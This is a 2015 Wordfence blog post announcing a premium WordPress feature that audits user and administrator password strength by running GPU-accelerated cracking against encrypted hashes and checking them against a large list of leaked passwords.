Wordfence Announces Password Auditing
This entry was posted in Wordfence, WordPress Security on April 8, 2015 by Mark Maunder 0 Replies
Today we are very excited to announce a new feature in Wordfence: Password Auditing. We have built a GPU cracking cluster by combining extremely high performance consumer gaming GPU’s with enterprise hardware to give our customers a way to audit the strength of their administrator and user passwords.
We worked closely with our hosting provider Netriver in Lynnwood to commission a new custom higher power rack to provide this feature. A photo of the system is on the left.
To try out the new feature, simply download the newest version of Wordfence which is 5.3.11 at the time of this release, click the “Password Auditing” menu option and follow the instructions to start an audit. [Or upgrade to 5.3.11 if you haven’t already]
Once the audit is complete you will see the results and have the ability to change weak passwords yourself and have the new password emailed to the site member. Alternatively you can send your users and administrators a request that they change their password themselves.
Once a weak member password has been changed on your WordPress site, the user with the weak password will drop off the report containing accounts with weak passwords. That way you can keep track of who has weak passwords reported in your last audit, and who has fixed the problem. You can re-submit user or administrator accounts for a new password audit at any time.
The Password Audit simulates what a hacker would do if they stole your WordPress database and launched a cracking attack on your password hashes. We run a GPU accelerated password cracking attack on your password hashes to test the strength of your passwords.
For admin accounts we add a large dictionary that includes over 260 million known compromised passwords from previous hacks on major websites and services. What this means is that if you were using, for example LinkedIn, and your password was leaked during the LinkedIn hack of 2012, we will let you know that that password is no longer safe for use.
Internally this feature uses a double layer of encryption to protect your data during the audit. First we encrypt the hashes we are going to operate on using a combination of AES encryption and RSA public key encryption. Then we send your encrypted data via SSL to our servers which provides a second layer of encryption. Once on our servers, the data is stored encrypted until it is audited and we never return sensitive data to your website. [Hey, we’re security geeks, we love this stuff!]
We will be writing more about this amazing feature and password security over the coming days. We hope you enjoy the awesome new feature. We had a lot of fun building the hardware and software to provide this service.
Footnote: This service is only available to Premium Wordfence customers at this time. You can visit our home page to upgrade to Wordfence Premium now.